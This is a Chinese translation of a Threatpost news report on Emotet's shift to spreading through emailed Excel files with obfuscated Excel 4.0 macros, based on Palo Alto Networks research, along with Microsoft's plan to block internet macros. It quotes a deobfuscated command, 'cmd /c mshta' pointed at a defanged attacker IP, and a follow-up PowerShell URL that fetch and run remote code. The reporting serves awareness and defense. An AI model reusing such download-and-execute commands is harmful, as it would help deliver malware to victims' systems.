研究人员发现,臭名昭著的Emotet恶意软件又一次转换了攻击策略,此次则是通过电子邮件来传播恶意的Excel文件。
Palo Alto网络公司的研究人员观察到了这种恶意软件的全新攻击方式,他们在星期二在线发表的一份报告中写道,众所周知,为避免被检测到,这种恶意软件会修改和改变其攻击载体,这样它就可以继续进行恶意攻击。
研究人员Saqib Khanzada、Tyler Halfpop、Micah Yates和Brad Duncan写道,Emotet的新的攻击链显示,在使用Emotet有效载荷之前,攻击者使用了多种不同类型的文件以及混淆脚本进行攻击。
这种新的攻击媒介在12月21日被发现,现在仍然很活跃。通过使用社会工程学,攻击者使用电子邮件传递一个Excel文件,其中含有混淆的Excel 4.0宏代码。
研究人员写道:"当宏文件运行时,它会下载并执行一个HTML应用程序,该程序会下载PowerShell文件来检索和执行最终的Emotet有效载荷。”
不死的恶意软件
据Check Point软件公司称,Emotet在2014年作为一个银行木马开始进行攻击,并不断发展成为了一个极具威胁性的文件,而且还一度形成了一个僵尸网络,其控制的机器数量超过了150万台。被TrickBot感染的后果是银行账户被接管、巨额的电汇欺诈和勒索软件攻击。
事实上,研究人员说,在其攻击的全盛时期,Emotet造成的损失估计约为25亿美元。
然后,在2021年1月,国际执法部门合作摧毁了一个由数百个僵尸网络服务器组成的网络,Emotet因此而停止了运行。然而,去年11月,在犯罪集团TrickBot的支持下,它又重新出现,现在又成为了一种新的威胁。
自回归以来,Emotet使用了新的攻击方法,比如线程劫持以及其他类型的战术。
研究人员认为,这种技术使用了被Emotet感染的Windows主机的邮件客户端窃取合法邮件来生成伪造回复。
研究人员写道,这种方法主要包括使用链接来安装一个伪造的Adobe Windows应用程序安装包。
使用Excel宏
据安全研究人员称,Emotet使用Excel宏的感染方法也有了几种新的变化。
在某些情况下,Emotet会在电子邮件的附件中添加一个受密码保护的.ZIP文件。研究人员解释说,在其他情况下,Emotet会使用附在电子邮件中的Excel电子表格进行攻击。
研究人员概述了Emotet僵尸网络在1月27日发送的一封电子邮件,其中使用了2021年6月被盗的一个电子邮件中的信息。研究人员写道,该电子邮件使用了一个钓鱼诱饵,名为”供应商的新公告",并在其中附加了一个加密的.ZIP文件,试图以此绕过安全系统。它还提到了电子邮件中的.ZIP文件的密码,因此受害者可以查看其中的内容。
研究人员写道:"加密的.ZIP文件中包含了一个带有Excel 4.0宏的Excel文件。这些宏经常被恶意攻击者滥用。受害者必须在Windows主机上启用宏,才可以执行恶意代码"。
研究人员写道:"一旦受害者这样做了,宏代码就会执行cmd.exe来运行mshta.exe,其功能是检索和执行一个远程的HTML应用程序,下载和执行PowerShell代码。”
他们解释说:"该代码利用了十六进制编码和字符混淆,试图以此来绕过静态检测。去混淆后,程序所执行的命令字符串是:cmd /c mshta http://91.240.118[.]168/se/s.html"。
最初的PowerShell脚本会连接到http://91.240.118[.]168/se/s.png,这个URL会返回一个攻击脚本,该脚本主要用于第二阶段的攻击过程,检索Emotet二进制文件。
第二阶段的PowerShell代码包含了14个URL,该脚本会尝试每个URL,直到成功下载Emotet二进制文件。
研究人员说,在其攻击链中有多个URL,其目的是在其中一个URL失效的情况下保证攻击还可以进行。他们补充说,攻击链的最后阶段Emotet .DLL会从资源部分加载一个加密的PE。
微软将默认阻止Macros
上周,微软宣布了一项在一些应用程序中默认禁用所有宏的计划,同时也承认宏机制是世界上最流行的传递恶意软件的方式之一。
这家计算机巨头指出,为了保护我们的客户,我们需要使那些从互联网上获得的文件中的宏更难以启用,从互联网上获得的VBA宏现在将被默认阻止。
三个流行的Office应用程序,Word、Excel和PowerPoint,加上Access和Visio,都受到了这一计划的影响。
对于从互联网上获得的文件中的宏,用户将不再能够通过点击一个按钮来启用该内容。这种情况下更安全,也将会保证更多用户的安全,包括家庭用户和管理组织中的信息工作者。
从4月下旬开始,将不再有 "启用宏 "的按钮,而是用一个 "了解更多 "的按钮来提示用户,在他们激活文档中的宏之前,他们将会看到更多信息。
本文翻译自:https://threatpost.com/emotet-spreading-malicious-excel-files/178444/如若转载,请注明原文地址